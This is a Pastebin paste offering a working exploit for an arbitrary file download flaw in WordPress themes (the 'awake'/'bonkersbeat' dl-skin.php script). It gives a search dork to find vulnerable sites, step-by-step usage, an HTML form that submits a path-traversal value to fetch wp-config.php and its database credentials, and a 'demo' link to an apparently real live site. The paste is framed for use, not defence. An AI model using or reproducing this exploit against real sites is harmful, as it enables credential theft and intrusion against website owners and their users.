API tools faq
paste
Professional-hacker

Wordpress Arbitrary File Download(ثغرة سحب ملف الكونفج)

Professional-hacker
Oct 18th, 2016
499
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.23 KB | None | 0 0
raw download clone embed print report
  1. # Exploit Title : Wordpress Arbitrary File Download(ثغرة سحب ملف الكونفج)
  2. # Dork : wp-content/themes/ /lib/scripts/
  3. # Tested on: [ BackBox ]
  4. # MyChannel Youtube : https://www.youtube.com/channel/UCPRRAzu8dMWxChn-RruC-eg/videos
  5. # Myblog : http://kader-information.blogspot.com/
  6. #Link video:https://www.youtube.com/watch?v=DbtO4vP9pJU&feature=youtu.be
  7. ######################
  8. # [+] DESCRIPTION :
  9. ######################
  10. + 1.- Use Dork
  11. + 2.- Download Exploit File Edit it
  12. + 3.- Edit: http://localhost/wp-content/themes/bonkersbeat/lib/scripts/dl-skin.php
  13. + 4.- Edit: the value you want To Download
  14. ######################
  15. # [+] Exploit:
  16. ######################
  17. <html>
  18. <body>
  19. <form action="http://localhost/wp-content/themes/awake/lib/scripts/dl-skin.php" method="post">
  20. Download:<input type="text" name="_mysite_download_skin" value="../../../../../wp-config.php"><br>
  21. <input type="submit">
  22. </form>
  23. </body>
  24. </html>
  25. ######################
  26. # [+]Demo:
  27.  
  28. http://www.ccriverrun.com/wp-content/themes/awake/lib/scripts/dl-skin.php
  29.  
  30.  
  31. subscribe for my channel and page in facebook
  32.  
  33. # My Blogger : http://kader-information.blogspot.com/
  34.  
  35. # Page FacebOOk : https://www.facebook.com/AnonymousPalestine.vip
  36.  
  37. By <3
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!